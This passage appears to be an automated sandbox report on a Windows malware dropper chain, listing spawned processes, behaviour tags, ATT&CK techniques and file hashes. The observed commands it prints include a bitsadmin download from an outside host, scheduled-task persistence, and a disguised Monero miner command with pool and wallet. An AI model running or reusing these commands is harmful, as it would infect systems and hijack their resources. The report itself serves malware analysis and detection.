- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"C:\Users\Admin\Documents\1qYRY02GWnuOYFefe_sWbDLj.exe"4⤵
-
C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe"C:\Users\Admin\Documents\_MiKooJ7I6X_jN040tJwAo75.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe"C:\Users\Admin\Documents\4VhdBSLn5e31ry9R4lNsreSR.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\1xwHsYY6JY2X9HJMmqNaZyN_.exe"C:\Users\Admin\Documents\1xwHsYY6JY2X9HJMmqNaZyN_.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\FXxQSNcPioIFIlbegIsf_vj4.exe"C:\Users\Admin\Documents\FXxQSNcPioIFIlbegIsf_vj4.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\s9CZCVkwZnCKvuAXID9kjcGG.exe"C:\Users\Admin\Documents\s9CZCVkwZnCKvuAXID9kjcGG.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7036493.exe"C:\Users\Admin\AppData\Roaming\7036493.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4964 -s 23085⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\3529569.exe"C:\Users\Admin\AppData\Roaming\3529569.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\sDD53xiAFXf45j9jMPz5AqNg.exe"C:\Users\Admin\Documents\sDD53xiAFXf45j9jMPz5AqNg.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe"C:\Users\Admin\Documents\kUZysLnJ5VU1GTZZD0uqlySQ.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe"C:\Users\Admin\Documents\9avfIn5IigP_u4pj8JpAtsYA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssB398.tmp\tempfile.ps1"4⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z4⤵
- Download via BitsAdmin
-
C:\Users\Admin\Documents\kGZKvxo6ms4BQ5U8cuw3ZTub.exe"C:\Users\Admin\Documents\kGZKvxo6ms4BQ5U8cuw3ZTub.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 2444⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\LSBnF4NXGH5rmUEXTqMKoFvs.exe"C:\Users\Admin\Documents\LSBnF4NXGH5rmUEXTqMKoFvs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x64.exe /install /quiet4⤵
-
C:\Users\Admin\Documents\VC_redist.x64.exeVC_redist.x64.exe /install /quiet5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c VC_redist.x86.exe /install /quiet4⤵
-
C:\Users\Admin\Documents\VC_redist.x86.exeVC_redist.x86.exe /install /quiet5⤵
-
C:\Windows\Temp\{B289DA0A-836C-4A8A-9DA1-4168C58199BA}\.cr\VC_redist.x86.exe"C:\Windows\Temp\{B289DA0A-836C-4A8A-9DA1-4168C58199BA}\.cr\VC_redist.x86.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x86.exe" -burn.filehandle.attached=576 -burn.filehandle.self=584 /install /quiet6⤵
-
C:\Windows\Temp\{59B2F177-22F7-4427-AD66-990CDA6B21D9}\.be\VC_redist.x86.exe"C:\Windows\Temp\{59B2F177-22F7-4427-AD66-990CDA6B21D9}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{399B689F-8033-46E5-B5E3-289A96EBE609} {75AEF579-016F-4CB3-A9BE-3D80B684C0EC} 46607⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 8687⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"C:\Users\Admin\AppData\Local\Temp\InstallShadowVPN.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RJB75.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-RJB75.tmp\installer.tmp" /SL5="$6030C,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 4925⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 13565⤵
- Program crash
-
C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GIFT8.tmp\n06BeJZiAJ9ZGyBXLy2bju0A.tmp"C:\Users\Admin\AppData\Local\Temp\is-GIFT8.tmp\n06BeJZiAJ9ZGyBXLy2bju0A.tmp" /SL5="$202CC,138429,56832,C:\Users\Admin\Documents\n06BeJZiAJ9ZGyBXLy2bju0A.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LM76P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LM76P.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-LTI9T.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTI9T.tmp\MediaBurner2.tmp" /SL5="$30308,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-UNCCA.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-UNCCA.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
-
C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe"C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KS6L5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-KS6L5.tmp\ultramediaburner.tmp" /SL5="$90250,281924,62464,C:\Program Files\Windows NT\ZEVHKBCHQY\ultramediaburner.exe" /VERYSILENT10⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
C:\Users\Admin\AppData\Local\Temp\ec-91e8d-2f4-3d8a4-dbd8bdaa020ca\Mopimukoxe.exe"C:\Users\Admin\AppData\Local\Temp\ec-91e8d-2f4-3d8a4-dbd8bdaa020ca\Mopimukoxe.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a6471811⤵
-
C:\Users\Admin\AppData\Local\Temp\f0-47c04-84b-db29a-3783c8f0e7b9f\Qaevemishifu.exe"C:\Users\Admin\AppData\Local\Temp\f0-47c04-84b-db29a-3783c8f0e7b9f\Qaevemishifu.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lgayu3ic.jk0\GcleanerEU.exe /eufive & exit10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exeC:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\f4ezw0of.tpb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1lm122iq.23c\ufgaa.exe & exit10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exeC:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe"C:\Users\Admin\AppData\Local\Temp\od0fu1ax.ney\anyname.exe" -q12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 79213⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\areua4by.v3l\gcleaner.exe /mixfive & exit10⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 17927⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth8⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6891150.exe"C:\Users\Admin\AppData\Roaming\6891150.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7120 -s 22728⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\6280455.exe"C:\Users\Admin\AppData\Roaming\6280455.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\6446650.exe"C:\Users\Admin\AppData\Roaming\6446650.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\5975108.exe"C:\Users\Admin\AppData\Roaming\5975108.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 23288⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628932158 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 8PFJ7Xr/RkiQhw851r/usQ.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 4483⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4828 -ip 48281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4568 -ip 45681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5388 -ip 53881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5344 -ip 53441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5280 -ip 52801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5360 -ip 53601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5328 -ip 53281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4112 -ip 41121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5632 -ip 56321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5868 -ip 58681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1432 -ip 14321⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\Temp\{CD37212B-4F5F-473E-978C-DF9ADC88A7A9}\.cr\VC_redist.x64.exe"C:\Windows\Temp\{CD37212B-4F5F-473E-978C-DF9ADC88A7A9}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x64.exe" -burn.filehandle.attached=584 -burn.filehandle.self=580 /install /quiet1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Temp\{B9B8ED8E-F0C5-482C-8C59-6CB7FA4773F1}\.be\VC_redist.x64.exe"C:\Windows\Temp\{B9B8ED8E-F0C5-482C-8C59-6CB7FA4773F1}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{D51149BE-F0A0-4B20-BBEA-5024E56AD5CD} {DC0B5AF9-C616-4544-A18F-83C2B15C0C72} 56482⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 14082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5200 -ip 52001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 672 -p 4964 -ip 49641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5796 -ip 57961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5380 -ip 53801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5724 -ip 57241⤵
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5648 -ip 56481⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3E5B60605DF948EA26B9487A719F4DEC C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F27C5DD74EAE78A12C670EA9177EE3C92⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1F7F67D099579AFBE22A390550F72D7B C2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 652 -p 7120 -ip 71201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5096 -ip 50961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4660 -ip 46601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 7024 -ip 70241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7024 -ip 70241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1492 -ip 14921⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1BITS Jobs
1Defense Evasion
Modify Registry
2Disabling Security Tools
1Virtualization/Sandbox Evasion
1BITS Jobs
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3f184e36-4f0f-4b8c-a2a0-38fcd1550f3c\@Cryptex777.dllMD5
e8641f344213ca05d8b5264b5f4e2dee
SHA196729e31f9b805800b2248fd22a4b53e226c8309
SHA25685e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24
SHA5123130f32c100ecb97083ad8ac4c67863e9ceed3a9b06fc464d1aeeaec389f74c8bf56f4ce04f6450fd2cc0fa861d085101c433cfa4bec3095f8ebeeb53b739109
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exeMD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exeMD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exeMD5
b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exeMD5
bda0c64936b09cfb76fda98e37f5b6a4
SHA18ee82a7dee86562cb7b1732dafe4c5a9f16f51b8
SHA2564f5a67a18795c134aa846250f5e88b5fafd28f329fd1742d02b141e1095f9783
SHA512cf1c0d7a5345ad68887a4f6328db54d3119935aad66544e466a002ec9491990da05614c0457c94e7545924b159afc0bc68f350342cc7f7335406c30ba0be362e
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exeMD5
bda0c64936b09cfb76fda98e37f5b6a4
